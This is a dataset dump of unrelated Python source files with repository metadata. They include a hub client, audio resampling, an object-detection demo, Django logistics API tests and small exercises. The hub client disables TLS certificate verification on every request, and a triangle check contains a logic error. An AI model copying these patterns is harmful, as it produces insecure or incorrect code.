2,235
py
Python
storage.py
computer-micro-mangangement/cmm_hub
1ec4ed8c86edcbbd5624396a4be1d6aa7e6132fb
[ "MIT" ]
null
null
null
storage.py
computer-micro-mangangement/cmm_hub
1ec4ed8c86edcbbd5624396a4be1d6aa7e6132fb
[ "MIT" ]
null
null
null
storage.py
computer-micro-mangangement/cmm_hub
1ec4ed8c86edcbbd5624396a4be1d6aa7e6132fb
[ "MIT" ]
null
null
null
import psutil from appJar import gui import config import requests as req import json import platform import sysInfo app = gui(title="CMM Hub", showIcon=False) navBarElements = [] navBarElementsCallName = [] currentContainer = "" def get_size(bytes, suffix="B"): """ Scale bytes to its proper format e.g: 1253656 => '1.20MB' 1253656678 => '1.17GB' """ factor = 1024 for unit in ["", "K", "M", "G", "T", "P"]: if bytes < factor: return f"{bytes:.2f}{unit}{suffix}" bytes /= factor def getServerInfo(): request = req.get(config.getServerAddress() + "/api/info", verify=False) if request.status_code == 200: jsonData = json.loads(request.text) return jsonData return {} def getUserInfo(): request = req.get(config.getServerAddress() + "/api/user/currentUser", verify=False, params={"devicesecret": config.getDeviceSecret()}) if request.status_code == 200: jsonData = json.loads(request.text) return jsonData return {} def getInstallableModules(): serverInfo = getServerInfo() moduleListURL = serverInfo["moduleListURL"] request = req.get(moduleListURL, verify=False) if request.status_code == 200: modules = {} data = request.text lines = data.split('\n') for line in lines: elements = line.split(',') modules[elements[0]] = {} modules[elements[0]]["link"] = elements[1].replace(" ", "") modules[elements[0]]["name"] = elements[0].capitalize() modules[elements[0]]["version"] = elements[2].replace(" ", "") return modules def getDeviceInfo(): deviceInfo = {} uname = platform.uname() deviceInfo["os"] = uname.system + str(uname.release) deviceInfo["name"] = uname.node deviceInfo["architecture"] = uname.machine deviceInfo["processor"] = {} deviceInfo["processor"]["processor Declaration"] = uname.processor deviceInfo["processor"]["cores"] = psutil.cpu_count(logical=False) deviceInfo["processor"]["threads"] = psutil.cpu_count(logical=True) svmem = psutil.virtual_memory() deviceInfo["installed RAM"] = get_size(svmem.total) return deviceInfo
28.653846
88
0.630425
239
2,235
5.861925
0.464435
0.03212
0.045682
0.040685
0.189864
0.189864
0.135617
0.104211
0.104211
0.104211
0
0.025287
0.221477
2,235
77
89
29.025974
0.779885
0.039374
0
0.155172
0
0
0.100047
0.021606
0
0
0
0
0
1
0.086207
false
0
0.12069
0
0.327586
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bd85a5016f4253e00cc44d9424523f4276b499b6
128
py
Python
python/testData/completion/heavyStarPropagation/lib/_pkg0/_pkg0_1/_pkg0_1_0/_pkg0_1_0_1/_pkg0_1_0_1_0/_mod0_1_0_1_0_4.py
jnthn/intellij-community
8fa7c8a3ace62400c838e0d5926a7be106aa8557
[ "Apache-2.0" ]
2
2019-04-28T07:48:50.000Z
2020-12-11T14:18:08.000Z
python/testData/completion/heavyStarPropagation/lib/_pkg0/_pkg0_1/_pkg0_1_0/_pkg0_1_0_1/_pkg0_1_0_1_0/_mod0_1_0_1_0_4.py
jnthn/intellij-community
8fa7c8a3ace62400c838e0d5926a7be106aa8557
[ "Apache-2.0" ]
173
2018-07-05T13:59:39.000Z
2018-08-09T01:12:03.000Z
python/testData/completion/heavyStarPropagation/lib/_pkg0/_pkg0_1/_pkg0_1_0/_pkg0_1_0_1/_pkg0_1_0_1_0/_mod0_1_0_1_0_4.py
jnthn/intellij-community
8fa7c8a3ace62400c838e0d5926a7be106aa8557
[ "Apache-2.0" ]
2
2020-03-15T08:57:37.000Z
2020-04-07T04:48:14.000Z
name0_1_0_1_0_4_0 = None name0_1_0_1_0_4_1 = None name0_1_0_1_0_4_2 = None name0_1_0_1_0_4_3 = None name0_1_0_1_0_4_4 = None
14.222222
24
0.820313
40
128
1.875
0.175
0.266667
0.466667
0.533333
0.88
0.88
0.746667
0
0
0
0
0.318182
0.140625
128
9
25
14.222222
0.363636
0
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0
0
0
0
0
0
1
null
1
1
1
1
1
1
0
0
0
0
1
0
0
1
0
0
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
10
bd86643159f81b1a7609b03844ed56a6c9324674
1,988
py
Python
teste.py
yagopessoa/extrator-caracteristicas
8fb54359836f2a7063fb34849bfdb1b4c88188b1
[ "MIT" ]
null
null
null
teste.py
yagopessoa/extrator-caracteristicas
8fb54359836f2a7063fb34849bfdb1b4c88188b1
[ "MIT" ]
4
2021-03-19T01:36:12.000Z
2022-01-13T01:21:07.000Z
teste.py
yagopessoa/extrator-caracteristicas
8fb54359836f2a7063fb34849bfdb1b4c88188b1
[ "MIT" ]
null
null
null
#!/usr/bin/python3 import cv2 import numpy as np import sys import os import pickle import datetime import base64 import io from matplotlib import pyplot as plt from PIL import Image import extract_feature # x = np.random.randint(25,100,25) # y = np.random.randint(175,255,25) # z = np.hstack((x,y)) # z = z.reshape((50,1)) # z = np.float32(z) # # plt.hist(z,256,[0,256]),plt.show() # # Define criteria = ( type, max_iter = 10 , epsilon = 1.0 ) # criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 10, 1.0) # # Set flags (Just to avoid line break in the code) # flags = cv2.KMEANS_RANDOM_CENTERS # # Apply KMeans # compactness,labels,centers = cv2.kmeans(z,2,None,criteria,10,flags) # A = z[labels==0] # B = z[labels==1] # # Now plot 'A' in red, 'B' in blue, 'centers' in yellow # plt.hist(A,256,[0,256],color = 'r') # plt.hist(B,256,[0,256],color = 'b') # plt.hist(centers,32,[0,256],color = 'y') # plt.show() # img = cv2.imread('C:\\Users\\yagor\\extrator-caracteristicas\\banco_imagens\\Parthenon\\spencer-davis-1533814-unsplash.jpg', cv2.COLOR_BGR2RGB) # # blur = cv2.bilateralFilter(img,9,500,500) # cinza = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) # canny = cv2.Canny(cinza, 150,150) # plt.subplot(121),plt.imshow(img) # plt.title('Imagem original'), plt.xticks([]), plt.yticks([]) # plt.subplot(122),plt.imshow(canny) # plt.title('Imagem filtrada'), plt.xticks([]), plt.yticks([]) # plt.show() imagens = extract_feature.ler_diretorio_imagens("banco_imagens/Colosseum") imagens += extract_feature.ler_diretorio_imagens("banco_imagens/Eiffel") imagens += extract_feature.ler_diretorio_imagens("banco_imagens/Louvre") imagens += extract_feature.ler_diretorio_imagens("banco_imagens/Parthenon") size = 300, 300 for imagem in imagens: real_img = Image.open(imagem) sqr_img = extract_feature.make_square(real_img) sqr_img.thumbnail(size, Image.ANTIALIAS) sqr_img.save(imagem.replace('banco_imagens', 'banco_imagens_sqr').replace('.jpg', '.png'))
30.121212
145
0.71328
309
1,988
4.466019
0.417476
0.06087
0.068841
0.069565
0.181159
0.150725
0.150725
0.150725
0
0
0
0.061574
0.117706
1,988
65
146
30.584615
0.7252
0.583501
0
0
0
0
0.156368
0.058008
0
0
0
0
0
1
0
false
0
0.52381
0
0.52381
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
2
bd87f0189f7348f8a469b192ca7c10a825cc2fa1
95
py
Python
lampions/__init__.py
Lampions/lampions
dac00e739b6361820f400a3a439dadd5d265c0d7
[ "BSD-3-Clause" ]
null
null
null
lampions/__init__.py
Lampions/lampions
dac00e739b6361820f400a3a439dadd5d265c0d7
[ "BSD-3-Clause" ]
null
null
null
lampions/__init__.py
Lampions/lampions
dac00e739b6361820f400a3a439dadd5d265c0d7
[ "BSD-3-Clause" ]
null
null
null
from . import console from .version import __version__ # noqa def main(): console.run()
13.571429
40
0.694737
12
95
5.166667
0.666667
0
0
0
0
0
0
0
0
0
0
0
0.210526
95
6
41
15.833333
0.826667
0.042105
0
0
0
0
0
0
0
0
0
0
0
1
0.25
true
0
0.5
0
0.75
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
0
1
0
0
0
0
5
bd884de362569f988f5fe329cd6525259b1ae410
1,840
py
Python
lawliet/mono/resample.py
Ryuk17/lawliet
ba4734557260b255896707210fca3e2fff311e87
[ "Apache-2.0" ]
2
2021-04-20T03:51:32.000Z
2021-06-16T11:48:06.000Z
lawliet/mono/resample.py
Ryuk17/lawliet
ba4734557260b255896707210fca3e2fff311e87
[ "Apache-2.0" ]
null
null
null
lawliet/mono/resample.py
Ryuk17/lawliet
ba4734557260b255896707210fca3e2fff311e87
[ "Apache-2.0" ]
null
null
null
""" @FileName: resample.py @Description: Implement resample @Author: Ryuk @CreateDate: 2021/06/27 @LastEditTime: 2021/06/27 @LastEditors: Please set LastEditors @Version: v0.1 """ import numpy as np import math __all__ = [ "direct_interpolation", "lagrange_interpolation", "sine_interpolation", ] def direct_interpolation(x, L, M): """ resample signal with direct interpolation :param x: input signal :param L: original frequency :param M: target frequency :return: resampled signal """ N = len(x) K = int((M / L) * N) factor = L / M y = np.zeros(K) for k in range(K): nk = factor * k n = math.floor(nk) if n + 1 >= len(x): continue w1 = nk - n w2 = 1 - w1 y[k] = w1 * x[n + 1] + w2 * x[n] return y def lagrange_interpolation(x, w, L, M): N = len(x) K = int((M / L) * N) factor = L / M y = np.zeros(K) for k in range(K): nk = factor * k n = math.floor(nk) - 1 for i in range(-w, w, 1): numerator = 1 denominator = 1 if n - i >= len(x): continue for j in range(-w, w, 1): if i != j: numerator *= nk - (n - j) denominator *= (j - i) y[k] += x[n - i] * numerator / denominator return y def sine_interpolation(x, w, L, M): N = len(x) K = int((M / L) * N) factor = L / M y = np.zeros(K) for k in range(K): nk = factor * k n = math.floor(nk) for i in range(-w, w, 1): if n - i >= len(x): continue if nk - n + i == 0: continue numerator = math.sin((nk - n + i)) denominator = math.pi * (nk - n +i) y[k] += x[n - i] * numerator / denominator return y
23.589744
54
0.490761
264
1,840
3.382576
0.246212
0.015677
0.016797
0.020157
0.402016
0.402016
0.388578
0.320269
0.320269
0.320269
0
0.028621
0.37337
1,840
77
55
23.896104
0.74588
0.17337
0
0.54717
0
0
0.040486
0.014845
0
0
0
0
0
1
0.056604
false
0
0.037736
0
0.150943
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bd89d14addd7fd9824eb02e80c4487068be6700a
1,432
py
Python
data/get_stats.py
joamatab/angler
d54d3718bfc8564f0a97faf89a8de747709be6b9
[ "MIT" ]
102
2018-11-06T16:11:58.000Z
2022-03-29T03:10:08.000Z
data/get_stats.py
bencbartlett/angler
db9eca35adc4708425de8e2e2ad7a06516966814
[ "MIT" ]
17
2018-11-06T15:53:15.000Z
2020-07-21T20:20:30.000Z
data/get_stats.py
bencbartlett/angler
db9eca35adc4708425de8e2e2ad7a06516966814
[ "MIT" ]
41
2018-11-21T08:43:03.000Z
2022-03-22T21:21:42.000Z
import numpy as np from device_saver import load_device """ Opens a device and prints its stored stats for the paper""" def get_stats(fname): print("\n============================================================") D = load_device(fname) print('input power of {:.4f} mW/um'.format(D.W_in*1000)) if hasattr(D, 'index_shift'): index_shift = D.index_shift else: index_shift = D.simulation.compute_index_shift() print('index shift: {:.2E}'.format(np.max(index_shift))) print('Q-factor: {:.2E}'.format(D.Q)) print('bandwidth: {:.1f} GHz'.format(D.FWHM / 1e9)) if D.structure_type == 'two_port': print('linear transmission: {:.4f}'.format(D.T_lin)) print('nonlinear transmission: {:.4f}'.format(D.T_nl)) elif D.structure_type == 'ortho_port': print('linear transmission (right) = {:.4f} %'.format(100*D.W_right_lin / D.W_in)) print('linear transmission (top) = {:.4f} %'.format(100*D.W_top_lin / D.W_in)) print('nonlinear transmission (right) = {:.4f} %'.format(100*D.W_right_nl / D.W_in)) print('nonlinear transmission (top) = {:.4f} %'.format(100*D.W_top_nl / D.W_in)) print("============================================================\n") if __name__ == '__main__': fname2 = 'data/figs/devices/2_port.p' get_stats(fname2) fnameT = 'data/figs/devices/T_port.p' get_stats(fnameT)
36.717949
95
0.569134
194
1,432
3.984536
0.381443
0.023286
0.025873
0.062096
0.310479
0.217335
0.170763
0.170763
0
0
0
0.026609
0.186453
1,432
39
96
36.717949
0.63691
0
0
0
0
0
0.383212
0.128467
0
0
0
0
0
1
0.037037
false
0
0.074074
0
0.111111
0.444444
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
1
0
1
bd8b0ea4d67316a57577ad9cd394adb4172f74c1
2,130
py
Python
src/demo.py
lhcezx/Graph-FPN
55eb9283a7df83e003c84eede65a2700bb9fa45c
[ "MIT" ]
19
2021-11-16T05:32:45.000Z
2022-01-27T09:29:50.000Z
src/demo.py
lhcezx/Graph-FPN
55eb9283a7df83e003c84eede65a2700bb9fa45c
[ "MIT" ]
1
2021-11-15T15:44:45.000Z
2021-12-13T04:26:26.000Z
src/demo.py
lhcezx/Graph-FPN
55eb9283a7df83e003c84eede65a2700bb9fa45c
[ "MIT" ]
1
2022-01-04T14:10:58.000Z
2022-01-04T14:10:58.000Z
import os import zipfile import tensorflow as tf import tensorflow_datasets as tfds import init_path from configs.configs import parse_configs from detection.utils.Label import * from detection.utils.preprocess import * from model.network import DecodePredictions from model.get_model import backbone, models config = parse_configs() def get_demo_data(): url = "https://github.com/srihari-humbarwadi/datasets/releases/download/v0.1.0/data.zip" filename = os.path.join(config.root_dir, "data_demo", "data.zip") tf.keras.utils.get_file(filename, url) with zipfile.ZipFile(filename, "r") as z_fp: z_fp.extractall(os.path.join(config.root_dir,"data_demo/")) def demo(): get_demo_data() model = models[config.Arch](config.num_classes, backbone[config.backbone]) # fine_tune_checkpoint_type ckpt = tf.train.Checkpoint(model) ckpt.restore(tf.train.latest_checkpoint(config.weight)).expect_partial() # Prepare image for demo val_dataset, dataset_info = tfds.load("coco/2017", split="validation", with_info=True, data_dir=os.path.join(config.root_dir,"data_demo/data"), download=False) int2str = dataset_info.features["objects"]["label"].int2str for sample in val_dataset.take(2): image = tf.cast(sample["image"], dtype=tf.float32) input_image, ratio_short, ratio_long = prepare_image(image) # Inference predictions = model(input_image) detections = DecodePredictions(confidence_threshold=0.5)(input_image, predictions) num_detections = detections.valid_detections[0] class_names = [int2str(int(x)) for x in detections.nmsed_classes[0][:num_detections]] visualize_detections(image, detections.nmsed_boxes[0][:num_detections].numpy(), class_names, detections.nmsed_scores[0][:num_detections].numpy(), ratio_short, ratio_long ) if __name__ == "__main__": demo()
39.444444
99
0.656338
258
2,130
5.193798
0.426357
0.023881
0.022388
0.035821
0.075373
0.075373
0.075373
0.075373
0.052239
0
0
0.011714
0.238498
2,130
54
100
39.444444
0.814427
0.02723
0
0
0
0.023256
0.080232
0
0
0
0
0
0
1
0.046512
false
0
0.232558
0
0.27907
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bd8b4af603fe82e4afc80393a64f4cdf97c3311e
337
py
Python
dfmbot/fb_dfmbot/models.py
acjh/dfm-bot
34a7d53861acea6a7287c9b4816806db864adb31
[ "MIT" ]
null
null
null
dfmbot/fb_dfmbot/models.py
acjh/dfm-bot
34a7d53861acea6a7287c9b4816806db864adb31
[ "MIT" ]
null
null
null
dfmbot/fb_dfmbot/models.py
acjh/dfm-bot
34a7d53861acea6a7287c9b4816806db864adb31
[ "MIT" ]
null
null
null
from __future__ import unicode_literals from django.db import models # Create your models here. class Person(models.Model): first_name = models.CharField(max_length=30) last_name = models.CharField(max_length=30) fbid = models.CharField(max_length=64, primary_key=True) last_message = models.CharField(max_length=255)
28.083333
60
0.774481
48
337
5.166667
0.583333
0.241935
0.290323
0.387097
0.241935
0.241935
0
0
0
0
0
0.031034
0.139466
337
11
61
30.636364
0.824138
0.071217
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0.285714
0
1
0
0
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
3
bd8bd77a5f4099e04b2c3dc2363a8eb44444ab90
16,569
py
Python
routelift_api/stops/tests.py
BitMask-Technologies/route-lift-api
7ac78c6cce523fc5a3852dca7b289fe3a5f3afa8
[ "MIT" ]
null
null
null
routelift_api/stops/tests.py
BitMask-Technologies/route-lift-api
7ac78c6cce523fc5a3852dca7b289fe3a5f3afa8
[ "MIT" ]
7
2021-06-24T16:12:09.000Z
2021-08-05T16:09:22.000Z
routelift_api/stops/tests.py
BitMask-Technologies/route-lift-api
7ac78c6cce523fc5a3852dca7b289fe3a5f3afa8
[ "MIT" ]
null
null
null
from datetime import datetime from django.contrib.auth.hashers import make_password from Logistics.models import LogisticCompanies from roles_and_permissions.operations import Operations from roles_and_permissions.resource_categories import ResourceCategories from roles_and_permissions.utils import createStaffRole from .models import StopFeedback, Stops import uuid from django.conf import settings from django.test import Client, TestCase from Users.models import Drivers # Create your tests here. client = Client() secret = settings.ROOT_SECRET content_type = "application/json" class StopTests(TestCase): @classmethod def setUpTestData(cls): global secret global content_type payload = { "name": "New Logistics5", "email": "info@newlogistics5.com", "phone": "08099514386", "address": "plot 7, The providince street", "city": "Shasha", "state": "Lagos", "country": "Nigeria", "description": "the powerful logistics", "motto": "the best", "administratorLastName": "Umoh", "administratorFirstName": "Simeon", "administratorUsername": "simeone05", "administratorEmail": "simeoneumoh@gmail.com", "administratorPhone": "08099514739", "administratorPassword": "mickey01" } response = client.post( '/v1/logistics', payload, content_type=content_type, HTTP_Secret=secret ) print(response) login_payload = { "userIdentity": "08099514739", "password": "mickey01", } driver_payload = { "firstname": "Simeone", "lastname": "Umoh", "username": "simlogistics", "email": "simonumoh@mailinator.com", "phone": "+234567890", "password": "whatever1" } login_response = client.post(path="/v1/login", data=login_payload, content_type="application/json", HTTP_SECRET=settings.TEST_SECRET, follow=True, secure=False, HTTP_ACCEPT='application/json', ) driver_response = client.post(path="/v1/users/drivers", data=driver_payload, follow=True, secure=False, HTTP_ACCEPT='application/json', content_type="application/json", HTTP_SECRET=settings.TEST_SECRET, HTTP_Token=login_response.json()['data'][ 'accessToken'] ) 
print(driver_response) company = LogisticCompanies.objects.first() driver = Drivers.objects.get(user_name="simlogistics") stop = Stops.objects.create( id=int(str(uuid.uuid4().int)[::6]), sender_name='Simeon Umoh', sender_address='14 Ogidi Crescent, Lagos', sender_phone='08099514739', sender_email='simeoneumoh@gmail.com', receiver_name='Matthew Odeyemi', receiver_address='Plot 8 the Providence Street', receiver_phone='08160267172', receiver_email='mattode@outlook.com', vehicle_type='motorcycle', additional_note='apartment', stop_time_window='50', load_capacity='large', stop_duration='10', priority_level='normail', driver=driver, company=company ) stop.save() def test_createStop(self): login_payload = { "userIdentity": "08099514739", "password": "mickey01", } login_response = client.post(path="/v1/login?user_type=staff", data=login_payload, content_type="application/json", HTTP_Secret=secret, ) driverId = Drivers.objects.get(user_name="simlogistics").id payload = { "senderName": "Simeon Umoh", "senderAddress": "14 Ogidi Crescent, Lagos", "senderPhone": "08099514739", "senderEmail": "simeoneumoh@gmail.com", "receiverName": "Matthew Odeyemi", "receiverAddress": "Plot 8 the Providence Street", "receiverPhone": "08160267172", "receiverEmail": "mattode@outlook.com", "vehicleType": "motorcycle", "additionalNote": "Bring to the apartment", "stopTimeWindow": "50", "driverId": driverId, "loadCapacity": "large", "stopDuration": "10", "priorityLevel": "normal" } response = client.post('/v1/stops', payload, content_type=content_type, HTTP_Token=login_response.json()[ 'data']['accessToken'] ) # Check that the response is 200 OK. 
self.assertEqual(response.status_code, 200) def test_retrieveCompanyStops(self): login_payload = { "userIdentity": "08099514739", "password": "mickey01", } login_response = client.post(path="/v1/login?user_type=staff", data=login_payload, content_type="application/json", HTTP_Secret=secret, ) response = client.get('/v1/stops', content_type=content_type, HTTP_Token=login_response.json()[ 'data']['accessToken'] ) # Check that the response is 200 OK. self.assertEqual(response.status_code, 200) def test_updateStop(self): login_payload = { "userIdentity": "08099514739", "password": "mickey01", } login_response = client.post(path="/v1/login?user_type=staff", data=login_payload, content_type="application/json", HTTP_Secret=secret, ) stopId = Stops.objects.first().id driverId = Drivers.objects.get(user_name="simlogistics").id payload = { "senderName": "Simeon Umoh", "senderAddress": "14 Ogidi Crescent, Lagos", "senderPhone": "08099514739", "senderEmail": "simeoneumoh@gmail.com", "receiverName": "Matthew Odeyemi", "receiverAddress": "Plot 8 the Providence Street", "receiverPhone": "08160267172", "receiverEmail": "mattode@outlook.com", "vehicleType": "motorcycle", "additionalNote": "Bring to the apartment", "stopTimeWindow": "50", "driverId": driverId, "loadCapacity": "large", "stopDuration": "10", "priorityLevel": "normal" } response = client.put(f'/v1/stops/{stopId}', payload, content_type=content_type, HTTP_Token=login_response.json()[ 'data']['accessToken'] ) # Check that the response is 200 OK. 
self.assertEqual(response.status_code, 200) def test_updateStopStatus(self): login_payload = { "userIdentity": "08099514739", "password": "mickey01", } login_response = client.post(path="/v1/login?user_type=staff", data=login_payload, content_type="application/json", HTTP_Secret=secret, ) print(login_response.status_code) stopId = Stops.objects.first().id payload = { "feedback": "Completed" } response = client.put(f'/v1/stops/{stopId}?status=arrived', payload, content_type=content_type, HTTP_Token=login_response.json()[ 'data']['accessToken'] ) # Check that the response is 200 OK. self.assertEqual(response.status_code, 200) def test_retrieveStop(self): login_payload = { "userIdentity": "08099514739", "password": "mickey01", } login_response = client.post(path="/v1/login?user_type=staff", data=login_payload, content_type="application/json", HTTP_Secret=secret, ) stopId = Stops.objects.first().id response = client.get(f'/v1/stops/{stopId}', content_type=content_type, HTTP_Token=login_response.json()[ 'data']['accessToken'] ) # Check that the response is 200 OK. self.assertEqual(response.status_code, 200) def test_deleteStop(self): login_payload = { "userIdentity": "08099514739", "password": "mickey01", } login_response = client.post(path="/v1/login?user_type=staff", data=login_payload, content_type="application/json", HTTP_Secret=secret, ) stopId = Stops.objects.first().id response = client.delete(f'/v1/stops/{stopId}', content_type=content_type, HTTP_Token=login_response.json()[ 'data']['accessToken'] ) # Check that the response is 200 OK. 
self.assertEqual(response.status_code, 200) class FeedbackTest(TestCase): """feedback test begin""" @classmethod def setUpTestData(cls): company = LogisticCompanies.objects.create( id=1, name="First Company", email="test@mail.com", phone="08123456789", address="address", city="city", state="state", country="country", logo="logo", description="description", motto="motto", paid_until="2021-08-08", created_at=datetime.now() ) company.save() resources = ResourceCategories.list() operations = Operations.list() permissions = {resource: operations for resource in resources} role = createStaffRole( "company_admin", permissions, company ) role.save() driver = Drivers.objects.create( id=int(str(uuid.uuid4().int)[::6]), first_name="Benevolent", last_name="Gand", user_name="bcx", phone="08111111111", email="test@mail.com", password=make_password("password"), role=role, company=company, created_at=datetime.now() ) driver.save() stop = Stops.objects.create( id=int(str(uuid.uuid4().int)[::6]), sender_name='Simeon Umoh', sender_address='14 Ogidi Crescent, Lagos', sender_phone='08099514739', sender_email='simeoneumoh@gmail.com', receiver_name='Matthew Odeyemi', receiver_address='Plot 8 the Providence Street', receiver_phone='08160267172', receiver_email='mattode@outlook.com', vehicle_type='motorcycle', additional_note='apartment', stop_time_window='50', load_capacity='large', stop_duration='10', priority_level='normail', driver=driver, company=company ) stop.save() stop_feedback = StopFeedback.objects.create( message="This is an automated message", # file=file, stop=stop ) stop_feedback.save() def test_create_stop_feedback(self): """pass""" browser = Client() login_payload = { "userIdentity": "bcx", "password": "password", } stop = Stops.objects.get(receiver_phone='08160267172').id feedback_payload = { "message": "message", "stop": stop } login_response = browser.post(path="/v1/login?user_type=staff", data=login_payload, content_type="application/json", 
HTTP_SECRET=settings.TEST_SECRET, follow=True, secure=False, HTTP_ACCEPT='application/json', ) response = browser.post(path="/v1/stops/feedback", data=feedback_payload, follow=True, secure=False, HTTP_ACCEPT='application/json', content_type="application/json", HTTP_SECRET=settings.TEST_SECRET, HTTP_Token=login_response.json()['data'][ 'accessToken'] ) self.assertEqual(response.status_code, 200) def test_get_all_stop_feedbacks(self): browser = Client() login_payload = { "userIdentity": "bcx", "password": "password", } login_response = browser.post(path="/v1/login?user_type=staff", data=login_payload, content_type="application/json", HTTP_SECRET=settings.TEST_SECRET, follow=True, secure=False, HTTP_ACCEPT='application/json', ) response = browser.get(path="/v1/stops/feedback", follow=True, secure=False, HTTP_ACCEPT='application/json', content_type="application/json", HTTP_SECRET=settings.TEST_SECRET, HTTP_Token=login_response.json()['data']['accessToken']) self.assertEqual(response.status_code, 200) def test_retrieve_stop_feedback(self): """pass""" browser = Client() login_payload = { "userIdentity": "bcx", "password": "password", } login_response = browser.post(path="/v1/login?user_type=staff", data=login_payload, content_type="application/json", HTTP_SECRET=settings.TEST_SECRET, follow=True, secure=False, HTTP_ACCEPT='application/json', ) feedback_id = StopFeedback.objects.first().id response = browser.get(path="/v1/stops/feedback/{}".format(feedback_id), follow=True, secure=False, HTTP_ACCEPT='application/json', content_type="application/json", HTTP_SECRET=settings.TEST_SECRET, HTTP_Token=login_response.json()['data']['accessToken'] ) self.assertEqual(response.status_code, 200) # def test_delete_stop_feedback(self): # """pass""" # browser = Client() # login_payload = { # "userIdentity": "bcx", # "password": "password", # } # login_response = browser.put(path="/v1/login?user_type=staff", data=login_payload, # content_type="application/json", # 
HTTP_SECRET=settings.TEST_SECRET, follow=True, # secure=False, HTTP_ACCEPT='application/json', ) # feedback_id = StopFeedback.objects.first().id # response = browser.delete(path="/v1/stop/feedback/{}".format(feedback_id), # follow=True, secure=False, # HTTP_ACCEPT='application/json', # content_type="application/json", # HTTP_SECRET=settings.TEST_SECRET, # HTTP_Token=login_response.json()['data'][ # 'accessToken'] # ) # self.assertEqual(response.status_code, 200)
41.735516
124
0.5153
1,387
16,569
5.991348
0.165105
0.042359
0.045006
0.053189
0.725752
0.718652
0.704091
0.689892
0.689892
0.6858
0
0.035389
0.377512
16,569
396
125
41.840909
0.770312
0.080874
0
0.551929
0
0
0.205861
0.033915
0
0
0
0
0.026706
1
0.032641
false
0.041543
0.032641
0
0.071217
0.008902
0
0
0
null
0
0
0
0
1
1
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
3
bd8ea1d2de449075397b869d74b1b5b0f41e34e1
550
py
Python
exercicios-python/ex042.py
DaviStalleiken/codigos-de-desafios
e9ec388022b5f4bb2a5ab170c17969154ceaece3
[ "MIT" ]
null
null
null
exercicios-python/ex042.py
DaviStalleiken/codigos-de-desafios
e9ec388022b5f4bb2a5ab170c17969154ceaece3
[ "MIT" ]
null
null
null
exercicios-python/ex042.py
DaviStalleiken/codigos-de-desafios
e9ec388022b5f4bb2a5ab170c17969154ceaece3
[ "MIT" ]
null
null
null
r1 = float(input('Primeiro segmento: ')) r2 = float(input('Segundo segmento: ')) r3 = float(input('Terceiro segmento: ')) if r1 < r2 + r3 and r2 < r1 + r3 and r3 < r2 + r3: print('Você \033[32mpode\033[m formar um triângulo. ', end='') if r1 == r2 == r3: print(f'Seu triângulo é \033[36mequilátero\033[m.') elif r1 != r2 != r3 != r1: print(f'Seu triângulo é \033[36mescaleno\033[m.') else: print(f'Seu triângulo é \033[36misósceles\033[m.') else: print('Você \033[31mnão pode\033[m formar um triângulo.')
36.666667
66
0.612727
85
550
3.964706
0.352941
0.059347
0.053412
0.160237
0.320475
0.195846
0
0
0
0
0
0.136891
0.216364
550
14
67
39.285714
0.645012
0
0
0.153846
0
0
0.489091
0.130909
0
0
0
0
0
1
0
false
0
0
0
0
0.384615
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
bd8fec37c8f22bdce7067ff7cbd8f9c6cdace31b
1,158
py
Python
mimic/GUI/MainWindow.py
link00000000/mimic
9452f4311e70deb23286504d9b02c64b9a76e14c
[ "MIT" ]
2
2021-07-29T04:30:34.000Z
2021-08-06T04:58:39.000Z
mimic/GUI/MainWindow.py
link00000000/mimic
9452f4311e70deb23286504d9b02c64b9a76e14c
[ "MIT" ]
20
2021-04-02T17:03:53.000Z
2021-08-07T11:04:09.000Z
mimic/GUI/MainWindow.py
link00000000/mimic
9452f4311e70deb23286504d9b02c64b9a76e14c
[ "MIT" ]
null
null
null
"""Mimic main window.""" import tkinter as tk from mimic.EventEmitter import EventEmitter from mimic.GUI.AbstractTkinterWindow import AbstractTkinterWindow from mimic.GUI.Widgets.QRCode import QRCodeImage from mimic.Utils.Host import resolve_host class MainWindow(AbstractTkinterWindow, EventEmitter): """Mimic main window.""" widgets: list[tk.Widget] = [] def __init__(self, master: tk.Tk): """ Attaches main window to the main Tkinter instance. Should only pass the amin Tkinter instance as the `master`. I don't knwo what will happen if we try to nest windows inside eachother. Args: master (tk.Tk): Master Tkinter instance """ super().__init__(master) self.master = master self.title("Mimic") self.hide() self.create_widgets() # Hide when the close button ("x button") is clicked self.protocol("WM_DELETE_WINDOW", self.hide) def create_widgets(self): """Register widgets to window.""" qr_code = QRCodeImage(self, f"https://{resolve_host()}:8080") qr_code.pack()
27.571429
70
0.644214
139
1,158
5.251799
0.489209
0.049315
0.041096
0
0
0
0
0
0
0
0
0.004657
0.258204
1,158
41
71
28.243902
0.845169
0.305699
0
0
0
0
0.068966
0
0
0
0
0
0
1
0.117647
false
0
0.294118
0
0.529412
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
